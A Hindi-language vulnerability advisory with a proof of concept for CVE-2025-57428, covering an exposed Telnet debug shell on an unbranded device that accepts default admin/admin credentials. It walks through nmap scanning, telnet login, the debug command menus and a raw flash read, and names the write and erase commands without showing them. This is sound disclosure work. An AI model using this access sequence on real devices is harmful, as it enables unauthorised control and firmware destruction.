
CVE-2025-57428
⚠️ यह रिपॉजिटरी केवल CVE-2025-57428 के संदर्भ के रूप में रखी गई है।
अन्य सलाह और अपडेट के लिए, कृपया देखें: security-advisories.
यह उपकरण एक Telnet डीबग इंटरफ़ेस (डिफ़ॉल्ट रूप से पोर्ट 23 पर सक्षम) को उजागर करता है और व्यवस्थापक क्रेडेंशियल्स (`admin`/`admin` डिफ़ॉल्ट रूप से) स्वीकार करता है। प्रमाणीकरण के बाद शेल निम्न-स्तरीय कमांड्स (विशेष रूप से `spi` और `reg`) तक सीधी पहुंच प्रदान करता है, जिससे मनमाना फ़र्मवेयर भ्रष्टाचार, उपकरण ब्रिकिंग और कार्यक्षमता या सुरक्षा कॉन्फ़िगरेशन का नुकसान हो सकता है।
नोट: मैं जानबूझकर उन कमांड्स को छोड़ रहा हूं जो विनाशकारी लेखन करते हैं। नीचे दिया गया PoC इंटरफ़ेस के अस्तित्व और पहुंच की पुष्टि करता है बिना तैयार शोषण प्रदान किए।
LAN पर उपकरण को स्कैन करें:
nmap -p 23 <device-ip>
परिणाम: पोर्ट 23 (telnet) open दिखाता है।
Telnet के माध्यम से कनेक्ट करें और प्रमाणित करें (डिफ़ॉल्ट क्रेडेंशियल्स):
telnet <device-ip>
# Login as: admin
# Password: admin
लॉगिन के बाद, एक डीबग प्रॉम्प्ट CMD> प्रस्तुत होता है।
उपलब्ध कमांड्स की सूची बनाएं:
CMD>help
हेल्प आउटपुट निम्नलिखित मेनू दिखाता है:
cfg net os
os मेनू में प्रवेश करें:
CMD>os
फिर से उपलब्ध कमांड्स की सूची बनाएं:
OS>help
इस बार हेल्प आउटपुट निम्नलिखित कमांड्स दिखाता है:
thread mem spi reg cpuload cpubusy event
spi का उपयोग करने पर दिखता है।
अवलोकन:
मूल विक्रेता का कोई सुरक्षा संपर्क या समर्थन चैनल खोजने के प्रयास असफल रहे। उत्पाद अज्ञात मूल का एक रीब्रांडेड उपकरण प्रतीत होता है।
यह जानकारी केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है। लेखक इस जानकारी के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।
spi <rd/wr/er> <addr> [len]फ़्लैश मेमोरी पढ़ें:
OS>spi rd 0x000fd0f0 16
यह फ़्लैश क्षेत्र का एक हेक्स डंप लौटाता है:
4f30650a 938f56fa 1b663a19 e316d824
यह पुष्टि करता है कि कमांड काम करता है और शेल के पास निम्न-स्तरीय पहुंच है।
राइट कमांड (spi wr) और इरेज़ कमांड (spi er), साथ ही reg कमांड भी निष्पादित करने योग्य हैं।